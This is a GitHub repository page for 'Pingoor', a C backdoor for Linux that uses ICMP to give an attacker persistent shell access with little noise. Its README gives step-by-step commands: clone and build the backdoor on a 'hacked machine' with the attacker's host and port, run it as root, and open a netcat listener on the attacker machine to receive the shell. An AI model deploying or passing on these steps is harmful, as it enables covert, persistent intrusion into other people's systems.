Skip to content

Latest commit

 

History

14 Commits

Folders and files

NameName
Last commit message
Last commit date
 
 
 
 
 
 
 
 
 
 

Repository files navigation

「🚪」About Pingoor

Pingoor is a backdoor developed in C for the GNU/Linux operating system. Its main characteristic is to use the ICMP protocol to give the attacker access to the shell of a machine, making its access persistent with little noise.

How to Use

# Hacked machine
$ git clone https://github.com/brosck/Pingoor.git
$ cd Pingoor
$ HOST=<YOURHOST> PORT=<YOURPORT> make
$ sudo ./pingoor
# Attacker machine
nc -lnvp <YOURPORT>

Buy me a coffee?



About

「🚪」Linux Backdoor based on ICMP protocol

Topics

Resources

Stars

62 stars

Watchers

2 watching

Forks

Releases

Packages

Contributors

Languages